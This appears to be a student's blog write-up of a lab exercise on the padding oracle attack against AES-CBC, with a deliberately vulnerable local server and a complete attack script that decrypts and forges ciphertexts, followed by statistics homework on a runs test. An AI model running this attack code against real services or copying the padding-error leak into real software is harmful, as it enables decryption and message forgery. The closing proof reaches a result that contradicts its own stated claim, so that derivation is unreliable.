zoukankan      html  css  js  c++  java
  • Padding Oracle攻击解密AES

    1-Problem 2 (验证 Padding Oracle 攻击算法)

    ①Padding Oracle攻击原理介绍

    • Padding Oracle的基础

      攻击针对的是CBC模式。CBC模式即在分组加密的过程中,前一组的加密结果将会影响到下一次加密,形成迭代,加强加密算法的敏感性。其中最重要的就是这个IV,初始化向量IV与第一组明文XOR之后,经过运算得到新的IV,用于下一分组。

    • Padding Oracle 攻击的条件:

      1、攻击者能够获得密文(ciphertext),以及密文对应的IV(初始化向量)

      2、攻击者能够触发密文的解密过程,且能够知道密文的解密结果(因为需要根据结果不断尝试。

    • Padding Oracle 攻击的步骤:

      核心:通过穷举IV来爆破得到中间值(错误的IV会得到错误的padding,而如果不符合padding规则,程序会报错)

      1、初始化一个IV位 ['x00'] * 16,即16个x00

      2、服务端在解密的时候由于padding 不符合规则而导致报错

      3、接着,我们就可以将IV依次增大,去试探,直到不出现报错信息,则表示我们的padding正确,因为整个异或流程中,Intermediary Value是固定不变的,所以我们最多尝试0xFF次,就肯定能令最后的Padding为0x01

      4、通过上一步,可以得到初始向量的最后一位,和确定的Padding最后一位0x01,那么我们就能推导出中间值的最后一位。

      5、接着,我们就可以碰撞Padding最后两位是0x02 0x02的情况,来得到中间值的最后第二位

      6、以此类推,得到所有的中间值

    Tips:Intermediary Value(中间值)是指最后一个分组的解密结果

    • Padding Oracle的时间复杂度

      Padding Oracle攻击并没有破解掉加密算法的密钥,也没有能力对任意密文做逆向解密,只是可以利用一个有效密文,生成一个解密后得到任意指定内容明文的伪造密文。在时间复杂度上,以一个8byte的IV构造为例,每个Byte最坏的情况需要尝试256次,总共是2048次。

    ②Padding Oracle攻击代码实现

    由于AES加解密代码过于复杂,有些步骤原理好懂,但是用代码实现起来却很麻烦。故直接使用python提供的第三方库Crypto进行加密,此处只进行加解密的测试。

    • 项目框架

    为了便于测试,使用了flask这个轻量级web应用框架。将加解密平台一直挂在后端。其中.flaskenv为运行flask server的文件;app.py挂起加解密web端;test_request.py用于测试加解密,并以此说明本次攻击的原理;attack.py用于攻击。

    • 程序运行

    1、打开terminal启动flask server【命令:flask run】
    .flaskenv文件内容为FLASK_APP = "app.py"

    此时打开浏览器输入192.168.0.6:8081/发现成功挂起

    2、测试加解密结果,说明此次攻击的原理。【运行test_request.py】

    我们对zhangtuoning进行加密,结果为CbO!3t3lzMDDcBGbTl5M9DaHVGjR8iT2Qi-Cr-BJaAM~
    记下这串字符串,我们再来对其解密

    发现解密结果正确,为zhangtuoning

    此时我们修改密文中的一个字符

    抛出异常padding value error,与我们前面说的原理一致,能够知道解密的结果是否正确错误,是我们攻击的必要条件之一。

    3、实现Padding Oracle攻击。【运行attack.py】

    首先得到ilovecryptography的加密结果(图中框线位置),再对其进行攻击。可以看到通过/check请求,成功解密出明文, 即results[0]。 results[1]是每个数据分组的中间状态,即我们前面讲过的中间值。

    4、修改attack.py,改变初始变量IV,即改变第一个分组的解密结果。
    增加函数如下

    运行结果

    fake data!!完美!!

    • 代码展示【工程文件见附件】
    #!/usr/bin/python
    # coding=utf-8
    # python 3
    #app.py用于启动flask server挂起web端
    
    from http.server import BaseHTTPRequestHandler, HTTPServer
    from urllib.parse import urlparse, parse_qs, unquote
    import traceback
    import base64
    from Crypto import Random
    from Crypto.Cipher import AES
    
    # padding 对齐的字节数
    BS = 16
    
    def pad(s):
        return s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
    
    def unpad(s):
        '''检查解密串的padding是否正确,并去掉Padding'''
        pad = s[-1]
        # padding值不对就抛出异常,网上的python实现基本都忽略了padding值检查
        if pad > BS or pad < 1:
            # padding值大于0小于等于最大分组字节数
            raise Exception("padding error.")
        slen = len(s)
        for p in s[slen-pad:slen]:
            # 所有padding值相等
            if p != pad:
                raise Exception("padding value error.")
        print("unpad:", pad)
        return s[0:-pad]
    
    class AESCipher:
        """ AES cbc 加解密
        """
        def __init__(self, key):
            self.key = key.encode('utf-8')
    
        def encrypt(self, raw):
            raw = pad(raw).encode('utf-8')
            iv = Random.new().read(AES.block_size)
            c = AES.new(self.key, AES.MODE_CBC, iv)
            return str(base64.b64encode(iv + c.encrypt(raw)), 'utf-8')
    
        def decrypt(self, enc):
            enc = base64.b64decode(enc)
            iv = enc[:16]
            c = AES.new(self.key, AES.MODE_CBC, iv)
            deced = unpad(c.decrypt(enc[16:]))
            return deced
    
    cipher = AESCipher('1234567890123456')
    # cipher.encrypt('testaa')
    
    form = '''<!DOCTYPE html>
    <title>aes encoder/decoder</title>
    <form method="POST" action="/encode">
    <textarea name="body"></textarea>
    <br>
    <button type="submit">加密</button>
    </form>'''
    
    PORT_NUMBER = 8081
    
    def b64_url_dec(s):
        return s.replace('~', '=').replace('!', '/').replace('-', '+')
    
    def b64_url_enc(s):
        return s.replace('+', '-').replace('/', '!').replace('=', '~')
    
    class myHandler(BaseHTTPRequestHandler):
        # Handler for the GET requests
        def write_out(self, data):
            self.send_response(200)
            self.send_header('Content-type', 'text/html; charset=utf-8')
            self.end_headers()
            self.wfile.write(data)
    
        def do_GET(self):
            if "/decode" in self.path:
                try:
                    # 解密操作
                    query = urlparse(self.path).query
                    print('decode query:', query)
                    query_components = dict(qc.split("=")
                                            for qc in query.split("&"))
                    data = b64_url_dec(unquote(query_components["data"]))
                    deced = cipher.decrypt(data)
                    self.write_out(deced)
                except:
                    self.write_out(traceback.format_exc().encode())
            elif "/check" in self.path:
                try:
                    # 检查是否能正确解密
                    query = urlparse(self.path).query
                    print('check query:', query)
                    query_components = dict(qc.split("=")
                                            for qc in query.split("&"))
                    data = b64_url_dec(unquote(query_components["data"]))
                    deced = cipher.decrypt(data)
                    self.write_out(u'成功通过!'.encode('utf-8'))
                except:
                    self.write_out(traceback.format_exc().encode())
            else:
                self.write_out(form.encode())
    
        def do_POST(self):
            print("post:", self.path)
            if self.path == "/encode":
                # 加密操作
                try:
                    content_len = int(self.headers.get('Content-Length'))
                    post_body = self.rfile.read(content_len)
                    postvars = parse_qs(post_body, keep_blank_values=1)
                    print('post encode vars:', postvars)
                    body = str(postvars[b'body'][0], 'utf-8')
                    enced = cipher.encrypt(body)
                    out = b64_url_enc(enced)
                    self.write_out(out.encode())
                except:
                    self.write_out(traceback.format_exc().encode())
    
    try:
        # Create a web server and define the handler to manage the
        # incoming request
        server = HTTPServer(('', PORT_NUMBER), myHandler)
        print('Started httpserver on port ', PORT_NUMBER)
        # Wait forever for incoming htto requests
        server.serve_forever()
    
    except KeyboardInterrupt:
        print('^C received, shutting down the web server')
        server.socket.close()
    
    # coding=utf-8
    # python 3
    # attack.py padding oracle 实现代码
    
    from Crypto import Random
    import requests as req
    import re
    import base64
    
    # 分组最大字节数
    BS = 16
    
    proxy = 'http://127.0.0.1:8080'
    MY_PROXY = {
        # 本地代理,用于测试,如果不需要代理可以注释掉
        #'http': proxy,
        #'https': proxy,
    }
    
    host = 'http://192.168.0.6:8081'
    
    def pad(s):
        return s + (BS - len(s) % BS) * chr(BS - len(s) % BS)
    
    def unpad(s):
        return s[0:-s[-1]]
    
    def find_valid_byte(req_fn, find_valid_fn, data, pos, min_req):
        data = bytearray(data)
        results = {}
        for i in range(0x100):
            # 检测从0到255的值是否符合padding要求
            data[pos] = i
            results[i] = req_fn(bytes(data))
            if i >= min_req:
                r_data = find_valid_fn(results)
                if r_data:
                    return r_data
        return find_valid_fn(results)
    
    def format_padding_iv(iv, pos, value):
        r = bytearray(iv)
        for idx, val in enumerate(r):
            if idx > pos:
                r[idx] = val ^ value
            else:
                r[idx] = val
        return bytes(r)
    
    def padding_oracle_group(req_fn, find_valid_fn, data, orig_iv, i_state=b'', min_req=256):
        count = BS - len(i_state)
        iv = bytearray(Random.new().read(count) + i_state)
        r_istate = bytearray(i_state)
        for pos in reversed(range(count)):
            print("pos:%d iv:%s istate:%s" % (pos, iv, r_istate))
            pad_v = BS - pos
            curr_data = format_padding_iv(iv, pos, pad_v) + data
            print('pad_v:', pad_v, ' test data:', curr_data)
            val = find_valid_byte(req_fn, find_valid_fn, curr_data, pos, min_req)
            if val:
                r = val ^ pad_v
                print("find istate %02x at pos:%d" % (r, pos))
                iv[pos] = r
                r_istate.insert(0, r)
            else:
                print("can't find istate at pos:", pos)
                return None, r_istate
        deced_res = bytes(a ^ b for (a, b) in zip(orig_iv, r_istate))
        return deced_res, r_istate
    
    def partition_group(data):
        '''data按分组长度进行分组'''
        return [data[i:i+BS] for i in range(0, len(data), BS)]
    
    def padding_oracle(req_fn, find_valid_fn, data, min_req=256):
        parts = partition_group(data)
        ivs = parts[:-1]
        datas = parts[1:]
        result = b''
        istates = []
        for group_iv, group_data in zip(ivs, datas):
            group_result, group_istate = padding_oracle_group(
                req_fn, find_valid_fn, group_data, group_iv, min_req=min_req)
            result += group_result
            istates.append(group_istate)
        return result, istates
    
    def test_enc(txt):
        '''测试加密'''
        resp = req.post(host + '/encode', data={'body': txt}, proxies=MY_PROXY)
        return resp.text
    
    def test_dec(txt):
        '''测试解密'''
        resp = req.get(host + '/decode', params={'data': txt}, proxies=MY_PROXY)
        return resp.text
    
    def test_check(txt):
        '''测试检查'''
        resp = req.get(host + '/check', params={'data': txt}, proxies=MY_PROXY)
        return resp.text
    
    def b64_url_dec(s):
        return s.replace('~', '=').replace('!', '/').replace('-', '+')
    
    def b64_url_enc(s):
        return s.replace('+', '-').replace('/', '!').replace('=', '~')
    
    def bytes_to_str(data):
        return "".join(chr(x) for x in bytearray(data))
    
    def my_dec_req(data):
        '''测试解密,注意这里的data是原始字节'''
        txt = b64_url_enc(bytes_to_str(base64.b64encode(data)))
        return test_check(txt)
    
    def my_check_ok(resps):
        '''检测并返回解密成功的值'''
        for value, resp in resps.items():
            if re.match(r'成功', resp):
                return value
        return None
    
    def build_fake_first(data, fake_data, data_is):
        ''' data为密文数据
        fake_data 伪造的第一个分组数据
        data_is 解密出的中间状态值'''
        if len(fake_data) > BS:
            raise Exception('fake data too large!')
        new_data = bytearray(data)
        fake_group_data = pad(fake_data)
        for i in range(BS):
            new_data[i] = ord(fake_group_data[i]) ^ data_is[i]
        return new_data
    
    # 获取一个加密数据
    test1 = test_enc('ilovecryptography')
    test_data = base64.b64decode(b64_url_dec(test1))
    
    # 这里使用min_req选项,能显著加快运行速度
    results = padding_oracle(my_dec_req, my_check_ok, test_data, min_req=10)
    print(results)
    
    my_fake = build_fake_first(test_data, 'fake data', results[1][0])
    print(test_dec(b64_url_enc(bytes_to_str(base64.b64encode(my_fake)))))
    

    2-Problem 3 (变化点个数的概率分布)

    (是ε = ε_1ε_2···ε_{n+1} 是 i.i.d.), 定义 (χ(ε_i) = ε_i⊕ε_{i+1}) , 即 (χ(ε_i) = 1)表示在第 (i)位置的 (ε_i), 和后一 位的 (ε_{i+1})之间发生了比特翻转. 设 (ξ = sum_{i=1}^{n}{χ(ε_i)})

    1、 (ξ) 是什么分布

    2、 (ε=11001001000011111101101010100010001000010110100011 00001000110100110001001100011001100010100010111000) , 计算观察值和 P 值(借助 refc 函数的程序)。

    3、取(α = 0.01), 拒绝还是接受“(是ε 是 i.i.d.) 样本”?

    • (ξ) 是正态分布

    • char k0;
      char k1;
      int num = 0;
      char s[] = " 1100100100001111110110101010001000100001011010001100001000110100110001001100011001100010100010111000";
      
      for(int i=0;i<99;i++){
          k0 = s[i];
          k1 = s[i+1];
          if(k0!=k1){
              num++;
          }
      }
      
      printf("%d
      ",num);
      

      上述代码中的num值即为要求的 $ ξ $ ,可得 $ ξ $ =51。又容易得n=100。

      则观察值 (η = frac{ξ-n/2}{ sqrt{n/4} } =0.2)

      利用matlab中erfc可得P值为(0.8415)

    • 由第二问可得P值大于(α)值,则接受“(是ε 是 i.i.d.) 样本”。


    2-Problem 3 (变化点个数的概率分布)

    (Φ(x)=frac{1}{ sqrt{2π}} int_{-∞}^{x}{e^{-t^2/2}}dt) 是标准正态分布的分布函数,定义余差函数 (refc(z) = frac{2}{sqrt{π}}int_{z}^{∞}{e^{-u^2}}du) .

    证明$ P(|x| > |c|) = refc( frac{c}{sqrt{2}} )$。

    • 其B部分总面积由积分函数 (frac{1}{sqrt{2pi}}int_{-infty}^{-c}{e^{-t^2/2}}dt + frac{1}{sqrt{2pi}}int_{c}^{infty}{e^{-t^2/2}}dt)得到,而由正态分布的性质可得B部分左右两边面积相等,

      而余差函数 (refc(z) = frac{2}{sqrt{pi}}int_{z}^{infty}{e^{-u^2}}du),令 (z= frac{c}{sqrt{2}}),余差函数为 (refc(frac{c}{sqrt{2}}) = frac{2}{sqrt{2pi}}int_{c}^{infty}{e^{-u^2/2}}du)

      即可得(S= frac{1}{2} refc(frac{c}{sqrt{2}})) ,即 (P(|x| > |c|) = frac{1}{2}refc(frac{c}{sqrt{2}})),即得证。

  • 相关阅读:
    Openrasp源码分析
    feifeicms后台任意文件读取
    python之迭代器和生成器
    java之导入excel
    jquery单击事件的写法
    java之高效操作文件
    多条件搜索优化sql
    java之代码复用
    java之接口文档规范
    eclipse之常用快捷键
  • 原文地址:https://www.cnblogs.com/poziiey/p/12454625.html
Copyright © 2011-2022 走看看